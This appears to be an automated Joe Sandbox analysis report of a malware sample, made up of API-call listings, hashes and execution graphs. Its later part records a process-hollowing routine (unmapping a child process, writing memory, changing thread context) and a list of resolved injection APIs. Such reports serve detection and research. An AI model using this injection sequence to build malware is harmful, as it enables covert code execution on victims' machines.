                control_flow_graph 743 cd84ab-cd84d9 call cd8477 748 cd84db-cd84de 743->748 749 cd84f3-cd850b call cd158d 743->749 751 cd84ed 748->751 752 cd84e0-cd84eb call cd158d 748->752 755 cd850d-cd850f 749->755 756 cd8524-cd855a call cd158d * 3 749->756 751->749 752->748 752->751 758 cd851e 755->758 759 cd8511-cd851c call cd158d 755->759 768 cd855c-cd8562 756->768 769 cd856b-cd857e 756->769 758->756 759->755 759->758 768->769 770 cd8564-cd856a call cd158d 768->770 774 cd858d-cd8594 769->774 775 cd8580-cd8587 call cd158d 769->775 770->769 777 cd8596-cd859d call cd158d 774->777 778 cd85a3-cd85ae 774->778 775->774 777->778 781 cd85cb-cd85cd 778->781 782 cd85b0-cd85bc 778->782 782->781 784 cd85be-cd85c5 call cd158d 782->784 784->781
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _free$ExitProcess___crt
                • String ID:
                • API String ID: 1022109855-0
                • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                • Instruction ID: 94db2c391f389abb18cf7c35c41ed7bf2bfa4ddfd4f31cb6f8d4cd34ffcdf2cc
                • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                • Instruction Fuzzy Hash: C031A031900250EBDF21AF14FC81849B7A4EB54320709862BFB15573A0EFB86ECDAF94
                APIs
                • std::exception::exception.LIBCMT ref: 00CFFC1F
                  • Part of subcall function 00CE169C: std::exception::_Copy_str.LIBCMT ref: 00CE16B5
                • __CxxThrowException@8.LIBCMT ref: 00CFFC34
                • std::exception::exception.LIBCMT ref: 00CFFC4D
                • __CxxThrowException@8.LIBCMT ref: 00CFFC62
                • std::regex_error::regex_error.LIBCPMT ref: 00CFFC74
                  • Part of subcall function 00CFF914: std::exception::exception.LIBCMT ref: 00CFF92E
                • __CxxThrowException@8.LIBCMT ref: 00CFFC82
                • std::exception::exception.LIBCMT ref: 00CFFC9B
                • __CxxThrowException@8.LIBCMT ref: 00CFFCB0
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                • String ID: leM
                • API String ID: 3569886845-2926266777
                • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction ID: 9337927cec00697f0cdcb88ae52695064b90b14e3798ea3c0d68d5bd4bbc5b1b
                • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction Fuzzy Hash: D511F879C0024DBBCF00FFA6D856CEEBBBCEA04344F448566BD1497281EB74A3588B94
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _free_malloc_wprintf$_sprintf
                • String ID:
                • API String ID: 3721157643-0
                • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                • Instruction ID: 4146c24f0b8a1a26a0804ef52e95729cae2ec3f49d88b15ae7b43ee056023be9
                • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                • Instruction Fuzzy Hash: BC11E4B29005547AC261B6B56C12EFF7BDC9F45702F0801AAFF9CD1282EA599B05B3B1
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset$_malloc_sprintf
                • String ID:
                • API String ID: 65388428-0
                • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                • Instruction ID: e10fed62f99922b23b0b650fff6a00dd656b1d1ea29dc84861c15b0743404e63
                • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                • Instruction Fuzzy Hash: 9C515E71D40209ABDB10DBA6DC46FEFBBB8FF05704F140029FA05B6281E774AA019BA5
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset_sprintf
                • String ID:
                • API String ID: 217217746-0
                • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction ID: 3ceaf8e77e32c95ecf5e81ac053b8f0e3b0d73c97fa192da4912d6f398307343
                • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction Fuzzy Hash: 71517FB1D40209AADF11DFE5DC46FEEBBB8EF04704F10403AF901B6291D775AA059BA5
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset_sprintf
                • String ID:
                • API String ID: 217217746-0
                • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction ID: 90518e922a87a066c7bec47523c6eae1f2fa6156e909f9fd96e7b4e0c739dd5e
                • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction Fuzzy Hash: 76516271D40209AADF21DFA5DC46FEFBBB8EB04704F140139F915B6281E774AA068BA4
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                • String ID:
                • API String ID: 3534693527-0
                • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction ID: 22f0a20ee5a0846e998d7edd441738024849127fa9ea4f9dc37cfd38d51b6a9b
                • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction Fuzzy Hash: 61310332A0062A6BDB616B648C02BBE77949F45B20F118016FB14EB381DF748E00E7A6
                APIs
                • __getptd_noexit.LIBCMT ref: 00D766DD
                  • Part of subcall function 00CD59BF: __calloc_crt.LIBCMT ref: 00CD59E2
                  • Part of subcall function 00CD59BF: __initptd.LIBCMT ref: 00CD5A04
                • __calloc_crt.LIBCMT ref: 00D76700
                • __get_sys_err_msg.LIBCMT ref: 00D7671E
                • __invoke_watson.LIBCMT ref: 00D7673B
                • __get_sys_err_msg.LIBCMT ref: 00D7676D
                • __invoke_watson.LIBCMT ref: 00D7678B
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                • String ID:
                • API String ID: 4066021419-0
                • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                • Instruction ID: 74e56fd538f1ee2d6e1745543477643a3fa31c14ba905503e975ca1a7d4255b5
                • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                • Instruction Fuzzy Hash: 8411B231601A186BEB296625DC42A7A738CDF407A5B548467FF0CA6A42F731DD0152B5
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: D
                • API String ID: 2102423945-2746444292
                • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction ID: fde4ea3ee9ac12ba3896b538bd247d2fcd893a8e7de9117faf795917c56ab83e
                • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                • Instruction Fuzzy Hash: C8E15D71D00219EBDF24DBA0DD99FEEB7B8BF04304F14416AE60AE6190EB746A85CF54
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: $$$(
                • API String ID: 2102423945-3551151888
                • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction ID: db725346ea75e4727ba2554c9f1a40c3c99744e117968ca691f63063ca15bc1d
                • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                • Instruction Fuzzy Hash: D491C071D00258DBEF20CFA0CC59BEEBBB4AF05304F244069E516B72C1EBB65A49DB65
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _wcsnlen
                • String ID: U
                • API String ID: 3628947076-3372436214
                • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction ID: e091d0fc2cc3e4a7d7d0785aaa7b56ff719965306db785d53a77c1da2e172afd
                • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction Fuzzy Hash: FD210832218608AEEB009BA59C46FBE339DDB44351F604167FB18CB390FA70EE4096A4
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: p2Q
                • API String ID: 2102423945-1521255505
                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction ID: 17c2f338d07ec6c1a25c295c7f8909d710f0d97d37992f66d1829be354c615bc
                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction Fuzzy Hash: 8AF0ED78698750A5F7217750BC27B857E917B35B08F104089E2182E3E5D3FD378CA79A
                APIs
                • std::exception::exception.LIBCMT ref: 00CFFBF1
                  • Part of subcall function 00CE169C: std::exception::_Copy_str.LIBCMT ref: 00CE16B5
                • __CxxThrowException@8.LIBCMT ref: 00CFFC06
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                • String ID: TeM$TeM
                • API String ID: 3662862379-3870166017
                • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction ID: 3923c05bcbaf9139bae90a7036c4ee2da3bdf19d2a9970a9895e32ea278096b8
                • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction Fuzzy Hash: C1D06775C0024CBBCB00EFA5D45ACDDBBBCAA04344B448466BD1497241EA74A3599B94
                APIs
                  • Part of subcall function 00CD197D: __wfsopen.LIBCMT ref: 00CD1988
                • _fgetws.LIBCMT ref: 00CBD15C
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: __wfsopen_fgetws
                • String ID:
                • API String ID: 853134316-0
                • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction ID: 08a3d5c04e356380a3c119afbe79d2147b06ac959e15ae20935d10abf5feeda0
                • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction Fuzzy Hash: 0D91A171D002599BCF20DFA4CC85BEEB7F5AF14314F14052AE926A3251F775AE04CBA6
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _malloc$__except_handler4_fprintf
                • String ID:
                • API String ID: 1783060780-0
                • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                • Instruction ID: 9aa5cbdc1c62813a37bd2a3a6a5ab0ce8a3514fba9264a922489cf37f7c893d3
                • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                • Instruction Fuzzy Hash: ADA181B0C00258EBEF11EFD4CC46BDEBB75AF14304F140029E50677292E7B65A49DBA6
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                • String ID:
                • API String ID: 2974526305-0
                • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                • Instruction ID: 550e5db4a02d21fcd5c4690d6d1bfafc330a6d258fe29030ca1d03287669c4ed
                • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                • Instruction Fuzzy Hash: CD51DA30A00705EBDB249F69898066EB7B5EF61320F24872FFA36963D0D7B19E51DB44
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction ID: 05c92e17852fa302fdd71a3a02873d0b6b8c0514d5595260c73fd46384109d61
                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction Fuzzy Hash: 3001487644014EFBCF565E85DC01CEE3FA2BB19350B588415FF6958831D236CAB6BB82
                APIs
                • ___BuildCatchObject.LIBCMT ref: 00D77A4B
                  • Part of subcall function 00D78140: ___BuildCatchObjectHelper.LIBCMT ref: 00D78172
                  • Part of subcall function 00D78140: ___AdjustPointer.LIBCMT ref: 00D78189
                • _UnwindNestedFrames.LIBCMT ref: 00D77A62
                • ___FrameUnwindToState.LIBCMT ref: 00D77A74
                • CallCatchBlock.LIBCMT ref: 00D77A98
                Memory Dump Source
                • Source File: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_cb0000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                • String ID:
                • API String ID: 2901542994-0
                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction ID: f73e7d8761e53efce0a06ebff706bdc99e73bdc32f978fa5beffa6a15465c759
                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction Fuzzy Hash: F5011332400109BBDF12AF55CC05EDA3BAAFF48758F158415FE1C66121E732E9A1EBB0

                Execution Graph

                Execution Coverage:1.3%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:0%
                Total number of Nodes:41
                Total number of Limit Nodes:8
                execution_graph 32032 c10000 32035 c10630 32032->32035 32034 c10005 32040 c10010 32035->32040 32037 c1064c LoadLibraryA 32038 c10702 32037->32038 32042 c11577 32038->32042 32041 c10028 32040->32041 32041->32037 32045 c105b0 32042->32045 32048 c105dc 32045->32048 32046 c105e2 GetFileAttributesA 32046->32048 32047 c1061e 32048->32046 32048->32047 32050 c10420 32048->32050 32051 c104f3 32050->32051 32052 c104fa 32051->32052 32053 c104ff CreateWindowExA 32051->32053 32052->32048 32053->32052 32054 c10540 PostMessageA 32053->32054 32055 c1055f 32054->32055 32055->32052 32057 c10110 VirtualAlloc GetModuleFileNameA 32055->32057 32058 c10414 32057->32058 32059 c1017d CreateProcessA 32057->32059 32058->32055 32059->32058 32061 c1025f VirtualFree VirtualAlloc Wow64GetThreadContext 32059->32061 32061->32058 32062 c102a9 ReadProcessMemory 32061->32062 32063 c102e5 VirtualAllocEx NtWriteVirtualMemory 32062->32063 32064 c102d5 NtUnmapViewOfSection 32062->32064 32065 c1033b 32063->32065 32064->32063 32066 c10350 NtWriteVirtualMemory 32065->32066 32067 c1039d WriteProcessMemory Wow64SetThreadContext ResumeThread 32065->32067 32066->32065 32068 c103fb ExitProcess 32067->32068 32070 b79026 32071 b79035 32070->32071 32074 b797c6 32071->32074 32075 b797e1 32074->32075 32076 b797ea CreateToolhelp32Snapshot 32075->32076 32077 b79806 Module32First 32075->32077 32076->32075 32076->32077 32078 b79815 32077->32078 32079 b7903e 32077->32079 32081 b79485 32078->32081 32082 b794b0 32081->32082 32083 b794c1 VirtualAlloc 32082->32083 32084 b794f9 32082->32084 32083->32084 32084->32084

                Control-flow Graph

                APIs
                • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00C10156
                • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 00C1016C
                • CreateProcessA.KERNELBASE(?,00000000), ref: 00C10255
                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00C10270
                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00C10283
                • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 00C1029F
                • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 00C102C8
                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 00C102E3
                • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00C10304
                • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 00C1032A
                • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00C10399
                • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 00C103BF
                • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 00C103E1
                • ResumeThread.KERNELBASE(00000000), ref: 00C103ED
                • ExitProcess.KERNEL32(00000000), ref: 00C10412
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                • String ID:
                • API String ID: 93872480-0
                • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction ID: 7c39374aef80fe5cc55f914ea9face54a793cb43859d3189c0c35e8653be8f96
                • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction Fuzzy Hash: C1B1B674A00208AFDB44CF98C895F9EBBB5BF88314F248158E509AB391D771AE81CF94

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 c10630-c11572 call c10010 LoadLibraryA call c11577
                APIs
                • LoadLibraryA.KERNELBASE(user32), ref: 00C106E2
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: LibraryLoad
                • String ID: CloseHandle$CreateFileA$CreateProcessA$CreateWindowExA$DefWindowProcA$ExitProcess$GetCommandLineA$GetFileAttributesA$GetMessageA$GetMessageExtraInfo$GetModuleFileNameA$GetStartupInfoA$GetThreadContext$MessageBoxA$NtUnmapViewOfSection$NtWriteVirtualMemory$PostMessageA$ReadProcessMemory$RegisterClassExA$ResumeThread$SetThreadContext$VirtualAlloc$VirtualAllocEx$VirtualFree$VirtualProtectEx$WaitForSingleObject$WinExec$WriteFile$WriteProcessMemory$kernel32$ntdll.dll$user32
                • API String ID: 1029625771-3105132389
                • Opcode ID: aab33881e6ea512dee0bea29e3953140485f8577d3db8e783070f8d433065c47
                • Instruction ID: 320b391f25a5f61316dbc75f4c3233536600e5ee25e7560a39e1d4807da627a8
                • Opcode Fuzzy Hash: aab33881e6ea512dee0bea29e3953140485f8577d3db8e783070f8d433065c47
                • Instruction Fuzzy Hash: 97A24460D0C6E8C9EB21C668CC4C7DDBEB51B26749F0841D9858C66292C7BB1B98CF76

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 50 c10420-c104f8 52 c104fa 50->52 53 c104ff-c1053c CreateWindowExA 50->53 54 c105aa-c105ad 52->54 55 c10540-c10558 PostMessageA 53->55 56 c1053e 53->56 57 c1055f-c10563 55->57 56->54 57->54 58 c10565-c10579 57->58 58->54 60 c1057b-c10582 58->60 61 c10584-c10588 60->61 62 c105a8 60->62 61->62 63 c1058a-c10591 61->63 62->57 63->62 64 c10593-c10597 call c10110 63->64 66 c1059c-c105a5 64->66 66->62
                APIs
                • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,INIT,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00C10533
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: CreateWindow
                • String ID: 0$INIT$d$mfoaskdfnoa$saodkfnosa9uin
                • API String ID: 716092398-2711948150
                • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction ID: 0b230702fe38690abba2edbd7288cb24f398f51bbfceb12d58f091477cd761a8
                • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction Fuzzy Hash: 67511A70D08388DAEB11CBE8C849BDDBFB26F11708F244058D5447F286C3FA5698DB66

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 67 c105b0-c105d5 68 c105dc-c105e0 67->68 69 c105e2-c105f5 GetFileAttributesA 68->69 70 c1061e-c10621 68->70 71 c10613-c1061c 69->71 72 c105f7-c105fe 69->72 71->68 72->71 73 c10600-c1060b call c10420 72->73 75 c10610 73->75 75->71
                APIs
                • GetFileAttributesA.KERNELBASE(apfHQ), ref: 00C105EC
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_c10000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID: apfHQ$o
                • API String ID: 3188754299-2999369273
                • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction ID: 5ceafbf84992c5a4c50c3761ed761711f7c5a523988a855385a71fcd185a64e6
                • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction Fuzzy Hash: 61011270C0424CEADB10DB94C5583EDBFB59F42308F148099D4152B242D7B69BD8DB91

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 76 b797c6-b797df 77 b797e1-b797e3 76->77 78 b797e5 77->78 79 b797ea-b797f6 CreateToolhelp32Snapshot 77->79 78->79 80 b79806-b79813 Module32First 79->80 81 b797f8-b797fe 79->81 82 b79815-b79816 call b79485 80->82 83 b7981c-b79824 80->83 81->80 88 b79800-b79804 81->88 86 b7981b 82->86 86->83 88->77 88->80
                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00B797EE
                • Module32First.KERNEL32(00000000,00000224), ref: 00B7980E
                Memory Dump Source
                • Source File: 00000005.00000002.2099680252.0000000000B79000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B79000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_b79000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: CreateFirstModule32SnapshotToolhelp32
                • String ID:
                • API String ID: 3833638111-0
                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction ID: bc952957af13d4e08a04916a1f3c002aabf478978bf85c919fbc3b012840ce62
                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction Fuzzy Hash: C5F096312007106FE7203FF9A88DB6E77E8EF89765F1046A8E65A910C0DB70EC454662

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 89 b79485-b794bf call b79798 92 b794c1-b794f4 VirtualAlloc call b79512 89->92 93 b7950d 89->93 95 b794f9-b7950b 92->95 93->93 95->93
                APIs
                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00B794D6
                Memory Dump Source
                • Source File: 00000005.00000002.2099680252.0000000000B79000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B79000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_b79000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction ID: d617f26454eb092f773773ffef33e80b8cf3462f41d05bb574efcb7645a35f95
                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction Fuzzy Hash: 8C112B79A00208EFDB01DF98C985E99BBF5EF08350F058094F9589B362D371EA90DB80

                Control-flow Graph

                • Executed
                • Not Executed
